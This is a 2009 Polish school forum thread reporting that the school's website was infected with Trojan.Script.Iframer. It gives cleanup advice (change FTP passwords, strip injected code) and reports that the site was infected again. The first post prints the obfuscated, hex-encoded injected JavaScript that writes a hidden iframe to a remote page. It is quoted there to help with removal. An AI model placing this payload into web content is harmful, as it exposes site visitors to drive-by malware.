Forum www.zstleszno.fora.pl Strona Główna www.zstleszno.fora.pl
Forum ZST w Lesznie
 
 FAQFAQ   SzukajSzukaj   UżytkownicyUżytkownicy   GrupyGrupy   GalerieGalerie   RejestracjaRejestracja 
 ProfilProfil   Zaloguj się, by sprawdzić wiadomościZaloguj się, by sprawdzić wiadomości   ZalogujZaloguj 

zst-leszno.interbit.pl - strona zawirusowana.

 
Napisz nowy temat   Odpowiedz do tematu    Forum www.zstleszno.fora.pl Strona Główna -> Konior po szkole / Strona WWW
Zobacz poprzedni temat :: Zobacz następny temat  
Autor Wiadomość
Pyrus




Dołączył: 31 Paź 2009
Posty: 22
Przeczytał: 0 tematów

Pomógł: 1 raz
Ostrzeżeń: 0/5
PostWysłany: Czw 22:20, 12 Lis 2009    Temat postu: zst-leszno.interbit.pl - strona zawirusowana.
Witam.

Pragnę poinformować iż oficjalna strona ZST została zawirusowana przez Trojan.Script.Iframer.
Poniżej podaję sposób na usunięcie tego wirusa:

1. Zmiana hasła do konta FTP serwera(WAŻNE: komputer z którego będzie prowadzona zmiana hasła musi być pozbawiony wirusów).
2. Oczyścić wszystkie pliki z zbędnego kodu(możliwe że taki sam jak poniżej)
Kod:

      <script>function c152364361251b48fcdcea61dc2(b48fcdcea61dc9){ return (parseInt(b48fcdcea61dc9,16));}function
b48fcdcea61df2(b48fcdcea61df9){ var b48fcdcea61dff='';b48fcdcea61e25=String.fromCharCode;for(b48fcdcea61e05=0;
b48fcdcea61e05<b48fcdcea61df9.length;b48fcdcea61e05+=2){
b48fcdcea61dff+=
(b48fcdcea61e25(c152364361251b48fcdcea61dc2(
b48fcdcea61df9.substr(b48fcdcea61e05,2))));}retu
rn b48fcdcea61dff;} var xce='';var b48fcdcea61e32='3C7'+xce+'3637'+xce+'2697'+xc
e+'07'+xce+'43E696628216D7'+xce+'96961297'+xce+'B646F637'+
xce+'
56D656E7'+xce+'42E7'+xce+'7'+xce+'7'+xce+'2697'+xce+'465287'+xce+'56E657'+xce+'363617'+xce+'065282027'+xce+'25
33632536392536362
537'+xce+'3225363125366425363525323025366525363125366425363525336425363325333125333525 2302537'+xce+'332537'+xce+'32253633253364253237
'+xce+'2536382537'+xce+'342537'+xce+'342537'+xce+'302533612532662532662537'+xce+'332536312536632536352537'+x

ce+'362536392537'+xce+'332536392537'+xce+'342536662537'+xce+'32
2532652536652536352537'+xce+'34253266253639253665253265253633253637'+xce+'25363925336625333226253237'+xce+'2532622534642536
312537'+xce+'342536382532652537'+xce+'322536662537'+xce+'35253
6652536342532382534642536312537'+xce+'342536382532652537'+xce+
'3225363125366525363425366625366425323825323925326125333125333825333825333025338253331253239253262253237'+xce+'253332253338253635253336253237'+xce+'2532302537'+xce+'37'+xce+'253639253634
2537'+xce+'34253638253364253335253332253331
53230253638253635253639253637'+xce+'2536382537'+xce+'342533642
533332533362533312532302537'+xce+'3
32537'+xce+'342537'+xce+'39253663253635253364253237'+xce+'2536342536392537'+xce+'332537'+xc

e+'302536632536312537'+xce+'39253361253230253665253666253665253635253237'+xce+'2533652533632532662
536392536362537'+xce+'3225363125366425363525336527'+xce+'29293B7'+xce+'D7'+xce+'6617'+xce+'2206D7'+
+'2697'+xce+'07'+xce+'43E';document.write(b48fcdcea61df2(b48fcdcea61e32));</script>


3. Ponownie zmienić hasło do [link widoczny dla zalogowanych]

[link widoczny dla zalogowanych]

Post został pochwalony 0 razy

Ostatnio zmieniony przez Pyrus dnia Czw 22:25, 12 Lis 2009, w całości zmieniany 2 razy
Powrót do góry
Zobacz profil autora
Zobacz poprzedni temat :: Zobacz następny temat  
Autor Wiadomość
5krzyk5




Dołączył: 29 Paź 2009
Posty: 67
Przeczytał: 0 tematów

Ostrzeżeń: 0/5
Skąd: Wielkopolska ;)
PostWysłany: Pią 0:18, 13 Lis 2009    Temat postu:
Łooooł xD

ciekawe ktoo zawirusował^^ Cool

Post został pochwalony 0 razy
Powrót do góry
Zobacz profil autora
Zobacz poprzedni temat :: Zobacz następny temat  
Autor Wiadomość
Pyrus




Dołączył: 31 Paź 2009
Posty: 22
Przeczytał: 0 tematów

Pomógł: 1 raz
Ostrzeżeń: 0/5
PostWysłany: Pią 16:52, 13 Lis 2009    Temat postu:
Wirus na 99% dostał się przy wgrywaniu plików poprzez FTP na serwer lub poprzez luki w całym systemie hostingowym Interbitu.



// Szybka reakcja z strony administratora, część strony już bez wirusów(wirus jest jeszcze w aktualnościach, planie zajęć, galeriach, serwerze dydaktycznym oraz dziale inne).

Na przyszłość nie polecam wykorzystywać Total Commandera, ponieważ to wirus z niego odczytuje hasła i loginy do [link widoczny dla zalogowanych]

Post został pochwalony 0 razy

Ostatnio zmieniony przez Pyrus dnia Pią 22:02, 13 Lis 2009, w całości zmieniany 2 razy
Powrót do góry
Zobacz profil autora
Zobacz poprzedni temat :: Zobacz następny temat  
Autor Wiadomość
Pyrus




Dołączył: 31 Paź 2009
Posty: 22
Przeczytał: 0 tematów

Pomógł: 1 raz
Ostrzeżeń: 0/5
PostWysłany: Śro 14:09, 23 Gru 2009    Temat postu:
Strona ponownie zwirusowana.
Ten sam wirus, taki sam sposób jego usuwania jak wcześniej.
Widać że obecny kod strony nie jest odporny na proste ataki.
[link widoczny dla zalogowanych]

Post został pochwalony 0 razy
Powrót do góry
Zobacz profil autora
Wyświetl posty z ostatnich:   
Napisz nowy temat   Odpowiedz do tematu    Forum www.zstleszno.fora.pl Strona Główna -> Konior po szkole / Strona WWW Wszystkie czasy w strefie EET (Europa)
Strona 1 z 1

 
Skocz do:  
Nie możesz pisać nowych tematów
Nie możesz odpowiadać w tematach
Nie możesz zmieniać swoich postów
Nie możesz usuwać swoich postów
Nie możesz głosować w ankietach

fora.pl - załóż własne forum dyskusyjne za darmo
Powered by phpBB © 2001, 2005 phpBB Group
Regulamin
Na skróty:Jakaś kategoriaKonior po szkoleStrona WWWHydeparkSamorząd uczniowskiAPEL w sprawie likwidacji pułku.